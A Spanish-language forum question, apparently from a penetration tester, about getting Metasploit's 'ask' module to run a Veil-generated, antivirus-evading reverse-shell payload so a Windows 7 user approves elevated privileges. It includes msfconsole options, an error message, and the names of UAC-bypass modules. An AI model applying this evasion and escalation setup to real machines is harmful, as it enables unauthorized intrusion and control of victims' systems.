La máquina que estoy atacando tiene antivirus instalado.
Me las arreglé para usar Veil Framework para crear una carga útil de shell inversa inicial que el AV no ha detectado. Sin embargo, UAC está habilitado en el destino de Windows 7.
Estoy intentando usar exploit/windows/local/ask
de Metasploit para hacer que el usuario aparezca , con la esperanza de que hagan clic en Sí para permitir que la carga útil cree otra shell inversa con privilegios elevados.
Sin embargo, las cargas útiles metasploit predeterminadas son detectadas por el AV, por lo que he usado payload/generic/custom
para establecer PAYLOADFILE
a mi Veil generado .exe
. Sin embargo, recibo el siguiente mensaje de error al ejecutar el exploit:
msf exploit(ask) > exploit
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[-] Exploit failed: NoMethodError undefined method 'length' for nil:NilClass
Me doy cuenta de que hay otras formas de evitar UAC:
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
Aunque como parte de este experimento de prueba de lápiz, quiero que el usuario final permita la carga de forma manual.
¿Es mi sintaxis correcta para el exploit:
msf exploit(ask) > show options
Module options (exploit/windows/local/ask):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION 4 yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload options (generic/custom):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOADFILE /usr/share/veil-output/compiled/payload_0907_cs.exe no The file to read the payload from
PAYLOADSTR no The string to use as a payload
Exploit target:
Id Name
-- ----
0 Windows
He buscado en Google el error pero parece que no devuelve nada relevante. Voy a hacer esto de la manera correcta?